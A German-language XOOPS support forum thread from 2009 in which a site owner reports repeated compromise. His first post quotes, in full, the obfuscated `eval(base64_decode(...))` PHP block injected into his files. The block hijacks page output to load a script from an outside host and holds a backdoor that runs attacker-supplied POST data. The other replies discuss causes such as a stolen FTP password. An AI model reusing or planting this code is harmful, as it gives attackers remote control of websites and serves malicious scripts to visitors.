Aw:: Neue Seite nach ein paar Stunden gehackt [Sicherheit von XOOPS] : myXOOPS German Support

Forenübersicht » Allgemeines Forum » Sicherheit von XOOPS » [Erledigt] Neue Seite nach ein paar Stunden gehackt

Leser in diesem Thema: 1 Anonyme(r)

Nach unten Vorheriges Thema Nächstes Thema Bitte erst registrieren. Danach ist es möglich Beiträge zu schreiben.

(1) 2 »

double09

Neue Seite nach ein paar Stunden gehackt

Hallo.

Nach langem hin und her hab ich jetzt mal mein Xoops komplett neu installiert. Einmal Version 2.3.3 und einmal 2.3.2b.
Und nach ein paar Stunden ging immer gar nichts mehr. Immer das selbe. Vorallem in den Index.html und in ein paar .php Dateien steht im Kopf immer folgendes:


<?php eval(base64_decode('aWYoIWlzc2V0KCRsZnJqcDEpKXtmdW5jdGlvbiBsZnJqcCgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihwcmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJGMWRHOWpZWEl1WldVdmFXMWhaMlZ6TDJkdmIyZHNaVEV5TXprellUSTBORGc0WldKaU56QXVjR2h3SUQ0OEwzTmpjbWx3ZEQ0PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gbGZyanAyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGxmcmpwMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkbGZyanAxKSljYWxsX3VzZXJfZnVuYygkbGZyanAxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2xmcmpwJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2xmcmpwJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGxmcmpwbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignbGZyanAyJykpIT0nbGZyanAyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php

Warum kann ich mir nicht erklären. Ich hab auf dem Webserver komplett alle Dateien aus dem html Ordner gelöscht es war also nur noch Xoops drauf. Im Protector wurde alles grün also sicher angezeigt. Bei jeder Neuinstallation hab ich eine neue MySQL Datenbank angelegt und Passwörter gändert. Module waren nur Protector und WF-Downloads 3.2 und mal 3.1 installiert.

Hat jemand eine Ahnung wie das sein kann? Bin echt am verzweifeln :(

Geschrieben: 20.10.2009

chris47803

Aw:: Neue Seite nach ein paar Stunden gehackt

Hallo!

Vermutlich kennt jemand das Passwort von deinem FTP.

Chris

Geschrieben: 20.10.2009

_________________
PersonalBit | Formel 1

feichtl

Aw:: Neue Seite nach ein paar Stunden gehackt

... oder der Webserver selbst ist das Problem.

Geschrieben: 20.10.2009

_________________
if(ahnung == 0) {use SEARCH; use BRAIN; use GOOGLE; } else {make post;}
Wie man Fragen richtig stellt

alfred

Aw:: Neue Seite nach ein paar Stunden gehackt

geht zu einem russischen Server, denke mal das der nicht mehr so frisch ist

Auch ist zu 99,9% nicht XOOPS dafür verantwortlich,
entweder dein Rechner (Keylogger o.ä.) oder der Server selbst.

Geschrieben: 20.10.2009

_________________
newBB Forum for XOOPS | Versicherungen leicht gemacht | Lust auf Urlaub?

double09

Aw:: Neue Seite nach ein paar Stunden gehackt

Ok. Jetzt scheint alles wieder zu passen.

Wahrscheinlich hat irgend ein Bot mein FTP Passwort gehackt.. XOOPS war unschuldig :)

Geschrieben: 23.10.2009

alfred

Aw:: Neue Seite nach ein paar Stunden gehackt

Zitat:

double09 schrieb:
Wahrscheinlich hat irgend ein Bot mein FTP Passwort gehackt..

Mir wäre das zu heiss , oder weisst du es genau?

Geschrieben: 23.10.2009

_________________
newBB Forum for XOOPS | Versicherungen leicht gemacht | Lust auf Urlaub?

exp

Aw:: Neue Seite nach ein paar Stunden gehackt

Hallo zusammen

Ein Bekannter hatte genau dieses Problem, in der Tat ist (wer auch immer) an das FTP Passwort gekommen. Das Problem lag auf seinem Rechner, er hatte sich, daran konnte er sich zumindest erinnern, irgendein "Anti-Sypware Programm" geladen, dass diesen Hybrid verteilt hat und nach Russland telefonierte! Er hatte auch kein XOOPS im Einsatz, daher kann man XOOPS an der Stelle fast sicher aus der Linie nehmen, was Sicherheit oder Lücke betrifft!

Gruß

Geschrieben: 23.10.2009

_________________
website

alfred

Aw:: Neue Seite nach ein paar Stunden gehackt

meine Antwort bezog sich nicht aufs XOOPS

Geschrieben: 23.10.2009

_________________
newBB Forum for XOOPS | Versicherungen leicht gemacht | Lust auf Urlaub?

exp

Aw:: Neue Seite nach ein paar Stunden gehackt

Meine Antwort im wesentlichen auch nicht Alfred

Schönes WE

Gruß

Geschrieben: 23.10.2009

_________________
website

double09

Aw:: Neue Seite nach ein paar Stunden gehackt

#10

Ich gehe davon aus, dass mein Passwort rausgefunden wurde da ich auf dem Webhost jahrelang keine wichtigen Files liegen hatte und deswegen dort auch nur ein ziemlich simples Passwort angelegt hatte.

Vor der Passwortänderung wäre die Seite bestimmt schon wieder 10 mal down gewesen ;)

Jetzt hab ich ein ziemlich sicheres Passwort und alles scheint bis jetzt ok zu sein.

Geschrieben: 23.10.2009

Forenübersicht » Allgemeines Forum » Sicherheit von XOOPS » [Erledigt] Neue Seite nach ein paar Stunden gehackt

Nach oben Vorheriges Thema Nächstes Thema

(1) 2 »

Bitte erst registrieren. Danach ist es möglich Beiträge zu schreiben.